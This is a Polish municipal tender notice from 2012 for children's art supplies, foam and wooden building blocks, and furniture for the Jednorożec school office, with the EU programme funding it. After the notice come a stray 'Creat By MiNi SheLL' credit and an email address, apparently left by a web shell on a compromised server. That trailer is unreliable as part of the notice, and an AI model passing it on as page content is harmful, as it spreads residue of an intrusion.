Farba Kri Kra Krea niebieska Nietoksyczny i hipoalergiczny koncentrat farby niebieskiej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach koncentratu a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
Farba Kri Kra Krea brązowa  Nietoksyczny i hipoalergiczny koncentrat farby brązowej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach koncentratu a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach.1 szt.
Farba Kri Kra Krea czarna  Nietoksyczny i hipoalergiczny koncentrat farby czarnej o pojemności 1 litra. Nie łączy się i nie miesza z farbami o tych samych właściwościach koncentratu a innych kolorach. Umożliwia tworzenie prac z zakresu symetrii i odbicia lustrzanego. Koncentrat umożliwia malowanie palcami oraz na różnych podłożach np. na plexi, szkle, drewnie, styropianie, świeczkach, żarówkach szyszkach, papierze, folii, itp. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli ale już nie o właściwościach umożliwiających malowanie na różnych materiałach. 1 szt.
Farba Kri Kra Krea złota  Koncentrat farby złotej nietoksycznej i hipoalergicznej o pojemności 1 litra. Nie miesza się z koncentratem farby o podobnych właściwościach, ale przy połączeniu z farbami daje obrazowi charakterystyczny połysk i ciekawą strukturę. Umożliwia malowanie palcami oraz na różnych formach pozwalając tworzyć niepowtarzalne formy np. na styropianie, folii świeczkach szkle, papierze. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i 3 uzyskując w ten sposób 4 litry klasycznej farby akwareli.1 szt.
Farba Kri Kra Krea  srebrna  Koncentrat farby srebrnej nietoksycznej i hipoalergicznej o pojemności 1 litra. Nie miesza się z koncentratem farby o podobnych właściwościach, ale przy połączeniu z farbami daje obrazowi charakterystyczny połysk i ciekawą strukturę. Umożliwia malowanie palcami oraz na różnych formach pozwalając tworzyć niepowtarzalne formy np. na styropianie, folii świeczkach szkle, papierze. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i3 uzyskując w ten sposób 4 litry klasycznej farby akwareli. 1 szt.
Farba Kri Kra Krea  perłowa  Koncentrat farby perłowej nietoksycznej i hipoalergicznej o pojemności 1 litra. Nie miesza się z koncentratem farby o podobnych właściwościach, ale przy połączeniu z farbami daje obrazowi charakterystyczny połysk i ciekawą strukturę. Umożliwia malowanie palcami oraz na różnych formach pozwalając tworzyć niepowtarzalne formy np. na styropianie, folii świeczkach szkle, papierze. 1 l koncentratu można rozcieńczyć z wodą w proporcji 1i 3 uzyskując w ten sposób 4 litry klasycznej farby akwareli.1 szt.
Farba do tekstylii  Nietoksyczny i hipoalergiczny koncentrat farby do tekstyliów o pojemności 0,5 litra. W połączeniu z koncentratem farby o tych samych właściwościach w proporcji 1 do 1, umożliwia malowanie na koszulkach bawełnianych bez obawy, że malunki spiorą się.1 szt.
Klej sztyft  Sztyft minimum 36 g. netto, nietoksyczny, hipoalergiczny, bardzo wydajny.  12 szt.x1 szt.
Rolka papieru 30cm x12m  Rolka papieru samoprzylepnego o długości 12 m i minimum szerokości 30 cm.1 szt.
Koła do malowania  Zespół dwóch, drewnianych kół pasowych o średnicy jednego koła nie mniejszej niż 21 cm, i średnicy drugiego koła nie mniejszej niż 8 cm, obracających się na stalowych osiach. Koła wprowadzane są w ruch. Do tworzenia form plastycznych1 szt.
Koszulka do malowania Koszulki ręcznie malowane wysokiej jakości farbami z przeznaczeniem do malowania na tkaninach 16 szt.
Klocki Koggi cz.1  Zestaw 100 kolorowych klocków w przeźroczystym wiaderku z tworzywa sztucznego .Klocki wykonane są z drewna bukowego bez sękowego, I jakości, bez żadnych środków konserwujących, bezpieczne dla dziecka. 1 szt. Najmniejszy klocek nie mniejszy niż 3cm x 3cm x 1.5cm, a największy nie większy niż 3cm x 1.5cm x 9cm; 3cm x 3cm x 6cm.
Klocki Koggi cz.2  zestaw klocków konstrukcyjnych waflowych mix 200 składający się z 200 elementów opakowanie: worek foliowy zamykany zatrzaskiem. 1 szt.
Klocki Koggi cz.3  zestaw klocków o wymiarach nie mniejszych i nie większych niż : 60x30x30 cm  2 szt., 30x30x15 cm  1 szt., 60x30x15 cm  1 szt., 90x30x15 cm  1 szt. Każdy klocek wykonany ze sprężystej pianki poliuretanowej o dużej gęstości i lekkości. Pianka naciągnięta kolorowym materiałem skają, łatwo zmywalnym i gładko przylegającym do pianki zamykany na zamek. całość obszyta mocnymi i gęstymi szwami 1 szt.
Klocki Koggi cz.4 zestaw klocków o wymiarach nie mniejszych i nie większych niż:30x15x30 cm2 szt. Każdy klocek wykonany ze sprężystej pianki poliuretanowej o dużej gęstości i lekkości, Pianka naciągnieta kolorowym materiałem skają łatwo zmywalnym i gładko przylegającym do pianki zamykany jest na zamek. całość obszyta mocnymi i gęstymi szwami1 szt.
Klocki Koggi cz.5  zestaw klocków o wymiarach nie mniejszych i nie większych niż: 30x30x30 cm 2 szt. Każdy klocek wykonany ze sprężystej pianki poliuretanowej o wysokiej i dużej lekkości, Pianka naciągnieta kolorowym materiałem skają łatwo zmywalnym i gładko przylegającym do pianki zamykany jest na zamek. Całość obszyta mocnymi i gęstymi szwami1 szt.
Klocki Koggi cz.6 zestaw klocków o wymiarach nie mniejszych i nie większych niż: 60x30x15 cm 2 szt., 30x30 cm 2 szt., 30x60 cm 2 szt., 100x25 cm 1 szt. Każdy klocek wykonany ze sprężystej pianki poliuretanowej o wysokiej gęstości i dużej lekkości, Pianka naciągnieta kolorowym materiałem skają, łatwo zmywalnym i gładko przylegającym do pianki zamykany jest na zamek. Całość obszyta mocnymi i gęstymi szwami.1 szt.
Meble zestaw1 szt. opis zamówienia: Zestaw mebli o długości nie mniejszej niż 5,00m. W skład zestawu  wchodzą: szafka z półkami 2 szt., szafka z szufladami żółta 1 szt., szafa wysoka żółta 1 szt., szafka z szufladami żółta 1 szt.
Ciąg dalszy opisu przedmiotu zamówienia znajduje się w załączniku nr 1a do ogłoszenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9, 30.21.31.00-6, 39.16.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku szczegółowego w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku szczegółowego w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z dostarczonym sprzętem Sprzedający dostarczy Kupującemu dokumenty i certyfikaty potwierdzające spełnianie wymaganych norm oraz potwierdzające dopuszczenie do obrotu handlowego oraz instrukcje i gwarancje i inne.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany umowy w następujących okolicznościach: 
1.Zmiany adresu siedziby Wykonawcy lub Zamawiającego,
2. Zmiany nazwy Wykonawcy,
3.Zmiany osób reprezentujących strony,
4.Zmiany przepisów prawnych mających wpływ na treść niniejszej umowy
3.5.Zmiany terminu realizacji umowy z przyczyn obiektywnych niezależnych od   Zamawiającego i Wykonawcy. 
Wszelkie zmiany i uzupełnienia treści zawartej umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jednorozec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Oświaty
ul. Odrodzenia 14, 06-323 Jednorożec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2012 godzina 10:00, miejsce: Gminny Zespół Oświaty
ul. Odrodzenia 14, 06-323 Jednorożec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com